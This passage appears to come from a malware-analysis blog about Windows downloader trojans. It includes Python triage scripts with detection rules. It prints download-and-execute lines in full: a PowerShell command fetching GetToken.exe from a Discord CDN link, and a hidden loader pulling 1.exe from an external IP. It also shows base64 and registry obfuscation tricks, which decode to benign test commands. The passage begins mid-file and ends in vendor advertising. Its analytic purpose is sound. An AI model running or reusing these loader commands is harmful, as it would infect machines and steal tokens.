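powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
start GetToken.exe
"""

SET_RE = re.compile(r"^set\s+([^=\s]+)=(.*)$", re.IGNORECASE)
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")

# (rule name, pattern, ATT&CK technique and meaning); the mapping is the editor's.
RULES = [
    ("self_hide", re.compile(r"\battrib\b.*\+h", re.I), "T1564.001: hidden attribute set on a file"),
    ("run_key_persistence", re.compile(r"\breg(\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I),
     "T1547.001: Run-key autostart"),
    ("startup_folder_persistence", re.compile(r"\\Start Menu\\Programs\\Startup", re.I),
     "T1547.001: copy into the Startup folder"),
    ("autoexec_persistence", re.compile(r"autoexec\.bat", re.I),
     "legacy autoexec.bat autostart, ignored by current Windows"),
    ("disable_taskmgr", re.compile(r"\bDisableTaskMgr\b", re.I), "T1562.001: Task Manager disabled by policy"),
    ("recon", re.compile(r"\b(wmic|systeminfo|getmac|ipconfig)\b", re.I), "T1082/T1016: host fingerprinting"),
    ("exfil_upload", re.compile(r"\bcurl\b.*-F\s+\S*document=@", re.I),
     "T1567: multipart upload; chat_id/document fields are the Telegram Bot API shape"),
    ("download_execute", re.compile(r"DownloadFile\(|DownloadString\(|Invoke-WebRequest|\bbitsadmin\b", re.I),
     "T1105: payload download"),
]


def expand_variables(script: str) -> List[str]:
    """Return the non-empty lines with every known %VAR% expanded.

    `set NAME=VALUE` stores everything after '=' verbatim (quotes included) and
    later references match NAME case-insensitively, as in cmd.exe. Unknown
    variables (%USERPROFILE%, %RANDOM%, %0 ...) are left as written.
    """
    env: Dict[str, str] = {}
    out: List[str] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        line = VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), line)
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
        out.append(line)
    return out


def triage(script: str) -> List[Dict[str, str]]:
    """Run every rule over the expanded lines; one finding per (rule, line) hit."""
    findings = []
    for line in expand_variables(script):
        for name, pattern, meaning in RULES:
            if pattern.search(line):
                findings.append({"rule": name, "meaning": meaning, "line": line})
    return findings


def rule_names(script: str) -> Set[str]:
    return {f["rule"] for f in triage(script)}


def extract_urls(script: str) -> List[str]:
    """Literal URLs in the expanded script; %WEBHOOK%-style indirection is not resolved."""
    return URL_RE.findall("\n".join(expand_variables(script)))


if __name__ == "__main__":
    for f in triage(SAMPLE_BAT):
        print(f"[{f['rule']}] {f['meaning']}\n    {f['line']}")
    print("URLs:", extract_urls(SAMPLE_BAT))
```

Run against the sample, the reg add line that reads `reg add %rEgINf% /v %VaLinf% ...` in the file comes out as `reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_%randoM%_toolbar" ...`, which is what the Run-key rule needs to see; a grep for CurrentVersion\Run on the raw file finds nothing on that line. Rules are deliberately broad (any curl -F document=@ upload, any DownloadFile call) because a triage pass should over-report and leave the judgement to the analyst.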

How To Remove Trojan:BAT/PSRunner.VS!MSR?

To remove Trojan:BAT/PSRunner.VS!MSR, you need to use an advanced anti-malware solution with a heuristic module. Additionally, it is crucial to maintain continuous system protection to prevent future infections. GridinSoft Anti-Malware is an excellent choice because, in addition to proactive protection, it has an Internet Security module. This will block potentially unsafe sites, thus preventing the infection process at the earliest stage.

Trojan:Script/Downloader!MSR
https://gridinsoft.com/blogs/trojan-script-downloader-msr/
Wed, 17 Jul 2024 10:17:32 +0000

Trojan:Script/Downloader!MSR is a malicious script that downloads other malware onto the target system. It is most commonly spread through illegal software and fake documents, and it can deploy pretty much any malicious program. Because of obfuscation, the script itself may go undetected while Defender reports powershell.exe as the affected file.

Trojan:Script/Downloader!MSR Overview

Trojan:Script/Downloader!MSR is a heuristic Microsoft Defender detection for a small malware-downloading script. Unlike a full-fledged dropper, this loader is disposable: it runs once, fetches and starts the payload, and is never needed again. It executes a handful of commands in PowerShell or Command Prompt, which is what triggers Defender. Since the detection is heuristic and the malicious behaviour happens inside the PowerShell host, Defender names powershell.exe as the affected file rather than the script that launched it.

Trojan:Script/Downloader!MSR typically spreads through the usual malware channels: game mods, pirated games and software, activators (KMS), and keygens. It is also distributed under the guise of legitimate files, masked with a double extension and an altered file icon. As for the payload, it most often delivers spyware, remote access tools, and ransomware.

Technical Analysis

Let's look at what Trojan:Script/Downloader!MSR does on the target system by examining the kind of script it runs. It performs no checks for a sandbox; it immediately does its one job, downloading and launching the payload:

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue' -ScriptBlock { (New-Object System.Net.WebClient).DownloadFile('http://5.252.161.59:8880/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' }

As we can see, the script uses PowerShell's WebClient to download a file to a fixed path and Start-Process to run it. -ExecutionPolicy Bypass sidesteps the execution policy, which only governs whether scripts run at all and is not a security boundary. -NoExit keeps the PowerShell host alive after the command finishes, so further commands can be issued, and -WindowStyle Hidden hides the console window from the user. Two caveats for anyone analysing this sample: -ScriptBlock is not a powershell.exe parameter, so the line as reproduced here would not parse verbatim; and the C:\test-MDATP-test\invoice.exe path and the overall shape of the command match Microsoft's documented Defender for Endpoint detection test, which uses the same download-and-run sequence against a local URL. Here the download URL points to an external host, but the resemblance matters when deciding whether a given alert is a real infection or a test (see the false-positive section below).

Basic Code Obfuscation

Although this is a fairly primitive loader, some obfuscation may be used to make detection harder. Below is one pattern such a script can use: it stores a base64-encoded PowerShell command in a registry value and later reads it back and executes it with iex (Invoke-Expression), so the command never appears in the script body itself, and the registry slot can double as a fileless foothold for whatever the script deploys. Note that as reproduced here the two lines name different keys (AppProgram is written, AtomicRedTeam is read), so the second line would find nothing; the intended pattern is to read back the key that was written.

reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

This stores a base64-encoded PowerShell command in a registry value, to be read back and executed by iex. Decoding the value shows what it actually contains: Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team", a harmless marker-file write taken from the Atomic Red Team test suite, which is also what the AtomicRedTeam key name refers to. In a real loader the same slot would hold a download-and-execute command. A second form of the same trick is PowerShell's -EncodedCommand (-e) switch, which takes the base64 of the command text encoded as UTF-16LE:

powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}

Base64 is an encoding, not encryption: there is no key, and anyone can decode it. It still defeats plain string matching, which is all this obfuscation aims for. The #{...} wrapper around the value is Atomic Red Team template notation and is not part of what powershell.exe receives. Decoded, the command reads & (gcm ('ie{0}' -f 'x')) ("Wr"+"it"+"e-H"+"ost 'H"+"el"+"lo, fr"+"om P"+"ow"+"erS"+"h"+"ell!'"): the format operator assembles the string iex, gcm (Get-Command) resolves it to Invoke-Expression, and the concatenated fragments form Write-Host 'Hello, from PowerShell!'. Again the payload is a benign test command; a real downloader would put its download-and-run logic in that position. The layers to peel off are the same either way: base64, string splitting, and indirect invocation of iex.
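The loader command line earlier in this section and the two base64 forms above call for the same analysis steps: pick out the powershell.exe switches that matter, decode the base64 (UTF-16LE for -EncodedCommand, plain text for the registry value), and collapse the string tricks. The following Python script is an added example, not code from the article or from the malware it describes; its inputs are the three fragments quoted in this post, copied verbatim, and its whitespace tokenizer is a simplification that suffices for them.

```python
"""Triage of powershell.exe command lines like those quoted in this analysis.

Added example, not code from the article or from the malware it describes.
Flags the host switches that matter (accepting the short forms and unambiguous
prefixes powershell.exe accepts), decodes base64 payloads whether UTF-16LE
(-EncodedCommand) or plain text (the registry value), and collapses the
"a"+"b" and 'ie{0}' -f 'x' string tricks. Tokenizing on whitespace is enough
for these lines; real process-creation logs need proper quote handling.
"""
import base64
import re
from typing import List, Optional

# Constructed inputs: the three fragments quoted above, copied verbatim.
LOADER_CMDLINE = r"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue' -ScriptBlock { (New-Object System.Net.WebClient).DownloadFile('http://5.252.161.59:8880/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' }"
REG_CMDLINE = r'reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f'
ENCODED_CMDLINE = "powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}"

# Canonical powershell.exe parameters worth flagging, and why.
SWITCHES = {
    "windowstyle": "hides the console window (flagged for Hidden only)",
    "executionpolicy": "skips the execution-policy check, which is not a security boundary",
    "noexit": "keeps the host alive for follow-up commands",
    "encodedcommand": "carries a base64-encoded UTF-16LE command",
    "noprofile": "skips profile scripts",
    "noninteractive": "suppresses prompts",
}
# Short forms powershell.exe resolves itself; plain prefix matching would leave -e ambiguous.
ALIASES = {"e": "encodedcommand", "ec": "encodedcommand", "enc": "encodedcommand",
           "ep": "executionpolicy", "w": "windowstyle", "nop": "noprofile", "noni": "noninteractive"}
DOWNLOAD_RE = re.compile(r"DownloadFile\(|DownloadString\(|Invoke-WebRequest|\biwr\b", re.I)
EXEC_RE = re.compile(r"Start-Process|Invoke-Expression|\biex\b|\bsaps\b", re.I)
TEMPLATE_RE = re.compile(r"^#\{(.*)\}$", re.S)  # Atomic Red Team #{...} placeholder wrapper
REG_DATA_RE = re.compile(r'/d\s+"([A-Za-z0-9+/=]+)"')
CONCAT_RE = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
FORMAT_RE = re.compile(r"'([^']*)'\s+-f\s+'([^']*)'")


def canonical_switch(token: str) -> Optional[str]:
    """Map '-WindowStyle', '-w', '-ExecutionP' ... to a canonical name, else None."""
    if not token.startswith("-"):
        return None
    name = token.lstrip("-").lower()
    if name in ALIASES:
        return ALIASES[name]
    hits = [s for s in SWITCHES if s.startswith(name)]
    return hits[0] if len(hits) == 1 else None  # ambiguous prefixes are not resolved


def suspicious_flags(cmdline: str) -> List[str]:
    """Canonical names of the flagged switches, in command-line order."""
    tokens = cmdline.split()
    flags: List[str] = []
    for i, tok in enumerate(tokens):
        canon = canonical_switch(tok)
        if canon is None or canon in flags:
            continue
        value = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if canon == "windowstyle" and not value.startswith("h"):
            continue
        if canon == "executionpolicy" and value not in ("bypass", "unrestricted"):
            continue
        flags.append(canon)
    return flags


def decode_b64_text(b64: str) -> str:
    """Base64 to text; UTF-16LE when every odd byte is zero (ASCII in UTF-16LE), else UTF-8."""
    raw = base64.b64decode(b64)
    if raw and len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def decoded_command(cmdline: str) -> Optional[str]:
    """The -EncodedCommand payload, decoded; the #{...} wrapper is not part of the real argument."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if canonical_switch(tok) == "encodedcommand":
            m = TEMPLATE_RE.match(tokens[i + 1])
            return decode_b64_text(m.group(1) if m else tokens[i + 1])
    return None


def registry_payload(reg_cmdline: str) -> Optional[str]:
    """Decode the base64 stored by a `reg add ... /d "<base64>"` line."""
    m = REG_DATA_RE.search(reg_cmdline)
    return decode_b64_text(m.group(1)) if m else None


def simplify_powershell(ps: str) -> str:
    """Join "a"+"b" fragments and resolve 'x{0}y' -f 'z' (single-placeholder case only)."""
    prev = None
    while prev != ps:  # repeat until no adjacent pair is left
        prev = ps
        ps = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', ps)
    return FORMAT_RE.sub(lambda m: "'" + m.group(1).replace("{0}", m.group(2)) + "'", ps)


def download_and_execute(cmdline: str) -> bool:
    return bool(DOWNLOAD_RE.search(cmdline) and EXEC_RE.search(cmdline))


if __name__ == "__main__":
    for line in (LOADER_CMDLINE, ENCODED_CMDLINE):
        print(suspicious_flags(line), "download+execute:", download_and_execute(line))
    print(registry_payload(REG_CMDLINE))
    print(simplify_powershell(decoded_command(ENCODED_CMDLINE)))
```

On the loader line the flags come back as noexit, executionpolicy and windowstyle, with the download-and-execute pair present; -ScriptBlock is not a powershell.exe switch and is ignored. The registry value decodes to the Set-Content marker-file write and the -e payload simplifies to & (gcm ('iex')) ("Write-Host 'Hello, from PowerShell!'"), which is the quickest way to confirm that both samples are test commands rather than live payloads.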

Is Trojan:Script/Downloader!MSR a False Positive?

Sometimes Trojan:Script/Downloader!MSR is a false positive. This mostly occurs when an unsigned program downloads something from the internet, and in some cases when the program contacts IP addresses with a bad reputation. Deliberate test scripts, such as Microsoft's Defender for Endpoint detection test or Atomic Red Team tests like the ones quoted above, trigger this detection by design. Regardless, it is always essential to check such detections to rule out a real threat.

For these purposes, I recommend using GridinSoft Anti-Malware. In addition to scanning and cleaning your system, it provides proactive device protection and Internet Security, which will prevent threats even at the download stage.
